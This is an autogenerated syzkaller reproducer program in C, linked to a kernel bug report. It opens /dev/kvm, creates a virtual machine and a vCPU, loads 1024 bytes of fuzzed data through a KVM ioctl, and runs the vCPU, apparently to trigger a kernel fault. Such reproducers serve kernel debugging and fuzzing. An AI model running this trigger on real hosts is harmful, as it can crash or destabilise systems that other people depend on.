// https://syzkaller.appspot.com/bug?id=83aa676a823eeb2855ab831541b2c8175904c281 // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include uint64_t r[3] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); intptr_t res = 0; memcpy((void*)0x20000000, "/dev/kvm\000", 9); res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000000ul, /*flags=*/0ul, /*mode=*/0ul); if (res != -1) r[0] = res; res = syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0xae01, /*type=*/0ul); if (res != -1) r[1] = res; syscall(__NR_ioctl, /*fd=*/r[1], /*cmd=*/0xae60, 0); res = syscall(__NR_ioctl, /*fd=*/r[1], /*cmd=*/0xae41, /*id=*/2ul); if (res != -1) r[2] = res; memcpy( (void*)0x20000100, "\xb4\x64\x74\xf8\x15\xe8\xd5\x53\x5f\x08\x87\xc4\x43\x35\xcc\x82\x4d\xc6" "\x12\x1b\xc7\x2a\x77\xf5\x32\xff\x5d\xad\x4d\x64\x3a\x9c\xab\x29\xd2\x31" "\x0e\x04\xbe\x14\xeb\x26\xc0\xaf\x49\x85\xfe\x45\xe3\xb3\xb0\x68\x0b\x3e" "\xc9\x27\x25\xd7\x4b\x97\x16\xe0\xf7\xc3\x11\x9a\x2c\x9a\x0a\xe6\x5f\xf4" "\x77\x2e\x2e\x12\x73\x3c\xb0\x13\xc4\x30\x8f\xe4\x08\x63\x48\x07\x47\xc0" "\xa7\xdd\xb9\x36\x1b\x15\x78\x01\x5c\xa1\xbb\x2c\x16\x77\xeb\xae\x09\x6f" "\x08\x34\x54\x76\xf5\x67\x44\x38\x42\x94\x6e\xd9\x46\x43\x4c\x75\x91\x6d" "\x1d\xb8\x3f\xe3\x05\x92\x0d\xe6\x5b\xfa\xf9\xbd\x94\x06\x72\x21\x68\x46" "\xcb\x16\xb8\xae\x67\xcd\x3a\xff\xc6\x13\x75\x38\x1f\x91\xb3\xb9\xf1\xcc" "\x5e\x38\xca\xfe\x52\x39\xae\xe7\x1d\xcd\x48\x1f\xbe\x1e\xcd\x25\x47\x90" "\x24\xa6\x76\xb2\x1b\x3a\xdc\x5e\x46\x3c\x9e\xff\xba\xad\x44\x69\xa7\x46" "\x97\xc2\x8f\xb9\xbe\xef\xa6\xa5\xd7\x36\x71\x2a\x55\xeb\x91\x10\xc2\xcf" "\x79\x64\x06\x2b\xa8\xcb\xc1\xc0\x38\xe8\x4f\x0f\x5d\xb7\xfc\x70\x53\x11" "\x8b\xf5\x22\x1e\x3e\xfa\x6f\xc3\xed\xb5\xd0\xca\x3c\xde\x70\x54\xdd\x07" "\x51\xa3\x32\x52\x0a\xa8\x47\x8b\x17\x75\xd5\x52\xc5\xcc\x24\xd3\xc2\xdf" "\x9e\xb3\x33\xe5\xca\x3a\xa0\x6c\x1c\x2c\xf8\x52\x67\x14\xf5\xca\xff\x2f" "\x55\xb4\x19\x76\xfc\x20\xb6\x4f\x1f\xc6\x1d\x5b\x44\xf5\x09\x53\x58\x4d" "\xb1\x1b\x7f\x89\xec\x68\x09\x8e\xaf\xa4\x8c\xeb\xd6\x88\x2a\x18\x25\xd3" "\x21\x30\xa3\x1a\xbf\xea\xfd\x19\x87\x31\x78\x79\xe2\x9a\xc5\x1b\x93\xc9" "\x65\x9e\x02\x3f\xff\x3d\xdb\x5e\x39\xdd\x19\xcc\x3e\xf1\xd8\x83\xc7\x8b" "\x9e\x07\x3d\x08\xa9\x19\x7f\xb3\x71\x7d\xf2\x38\xb9\x83\x18\x31\x21\x4b" "\x18\x66\x93\xbe\x9d\xd2\x56\x8b\xb7\x72\x72\xe8\x0d\xf5\xdf\xed\x03\xe8" "\xc4\x67\x62\x7b\xed\xfb\xd9\x33\x59\xa9\xf7\x9a\x3a\xa3\x7e\x87\x3d\xc1" "\x35\x7b\x37\xb4\x3d\x81\x3e\xa8\x52\x67\xb0\xdc\x8b\x1c\x4c\xc5\x1b\xd9" "\x85\x32\x88\x33\xbe\xb2\x67\x9b\x7f\xb7\x62\x55\x5b\xbe\xa2\xda\x93\x6b" "\x36\xf8\xf1\x67\x3f\xd5\xf6\x06\xb2\xb6\xeb\x23\xb7\x2b\xf9\x47\x20\x6e" "\x8d\xbf\xeb\x40\xca\x6f\x26\x5a\x34\x85\xc8\x44\x6e\x0f\x0d\xa6\x52\x86" "\x0b\x88\x32\x80\x73\xd2\x28\x2c\x14\xb4\x8a\x77\x74\xe6\x27\x54\xa9\x68" "\xb6\x0e\x92\x20\x5e\x8f\xaf\xcd\xd7\x0a\x55\xc3\xc4\xd1\xa4\x82\x1f\xf4" "\x4e\x6e\x36\x81\xf1\x5a\xe0\x91\x26\x2e\x3a\x32\x90\xa2\x4d\x8c\xea\xe3" "\x0e\xbb\xf9\xd2\x42\x87\xbb\x8a\x5d\x73\xc6\x08\xd4\x7d\x28\x7f\x9e\x71" "\x6c\xf0\x2b\x47\x96\xa8\x3f\xb0\xc0\x5e\x45\xb8\x9d\xe9\xef\x8b\xce\x83" "\x4e\x6d\x7a\x0b\xe6\xe3\x0d\x2c\x66\xcb\x6e\x64\x0c\xb0\x18\x98\x45\x4a" "\xd3\x61\xbc\x07\x01\xd8\xfe\x56\xf3\x35\xe2\x37\x3b\x2c\xde\x56\x92\xdb" "\x04\x69\x1c\xc4\xa6\x89\x03\x42\x72\xa8\xe0\x86\xa3\x2c\xe7\x06\x1b\x4f" "\x79\xfa\x8a\xfb\xb4\x8a\x6c\xe4\xb6\x2b\xdc\x44\xaf\x01\x3d\x78\x98\x04" "\x57\xe1\xfa\x61\xeb\x92\x04\x81\x86\x06\xf4\xc3\xb0\x3c\x0f\x33\xcd\x2a" "\x84\x1a\xc9\xbc\x2b\x73\x15\x1a\x96\xe3\x1a\xb9\x9e\x6e\xc9\x69\xb5\xf2" "\xc3\xed\xd5\xf9\xab\xc6\x98\x45\xe4\x87\xaf\x99\x27\x58\xba\x44\x53\x68" "\xda\x93\xda\xe1\xd4\x43\x60\xd5\x2a\x53\x4a\x88\x27\x6b\x8a\xaf\x34\x98" "\x41\xd8\xa4\x78\x8c\x60\x40\x86\x18\x43\x7c\x44\x23\x08\xdb\xf7\x0e\xfe" "\xda\x2e\x54\xe9\xb9\xe4\xfe\x5f\x76\x99\x7c\x9d\xcb\x94\x5a\x26\xbd\x75" "\x74\x8c\x85\xd1\x9c\xa8\xb9\x92\x64\xdc\xe5\x05\x80\xe8\xb0\x3f\xe4\x79" "\x8e\x57\x50\xd4\xdb\xda\x40\x1d\xad\x7d\xf3\x1e\x9a\x7a\x6a\x3a\x83\xbf" "\xbd\xfb\x53\x94\xab\xd5\x81\xac\x08\x24\xfb\xcd\x75\xd2\xf5\x20\x5c\x0b" "\x7c\x91\x88\xe6\xf2\x6b\xfd\x97\x73\x4d\x9a\x20\x43\x3f\x6c\xdb\xa9\xd1" "\x4a\x5f\x32\xa4\xd9\x7a\x57\xf4\x60\x3b\x21\x14\x6f\xd1\xae\xbf\x08\x2e" "\x86\x3d\x46\x3c\x22\x4a\xd6\x23\xc1\x7d\x80\x43\xd3\xbf\x08\x3f\x03\x22" "\x40\x8d\xd6\xea\xd6\x91\x5a\xc6\xa4\x22\x2a\xb5\x14\x80\xeb\x6e\x11\xa8" "\x91\x33\x48\x21\x95\x15\x17\x0d\x9d\xf9\x0d\x72\xd7\x36\x3b\xbd\xa3\xe3" "\x27\xd1\x9f\x98\xc0\xa8\x56\xf9\x80\x76\x38\x0e\x78\x8e\x60\x2e\x8a\x2a" "\xe0\xa1\x93\x07\x86\x87\x4d\xc2\x1a\x2e\x99\xab\xda\x15\xf3\x54\x57\xcf" "\x1d\xcb\x44\x0c\x4b\x41\x35\x0d\x0e\xda\x35\x2a\xad\x7f\x57\xa0\xad\xc8" "\xa6\x91\x51\xfc\xca\xef\xc6\xe9\xb7\x70\xc9\xac\x12\x4d\xa0\x64\x60\x63" "\x5e\xd2\x1c\x4c\x11\xcd\x1a\x8e\xc7\x78\x06\x4c\x9f\x62\xef\xba\x29\x27" "\x82\x8b\x23\xf9\x4b\x16\x61\x9a\x55\x20\x73\x1c\x2c\x40\xab\x85\x83\xc9" "\xf2\xe7\x32\x33\xd7\x4b\x84\xf4\x87\x7c\xe6\xb3\x5b\xb1\x18\x03", 1024); syscall(__NR_ioctl, /*fd=*/r[2], /*cmd=*/0x4400ae8f, /*arg=*/0x20000100ul); syscall(__NR_ioctl, /*fd=*/r[2], /*cmd=*/0xae80, /*arg=*/0ul); return 0; }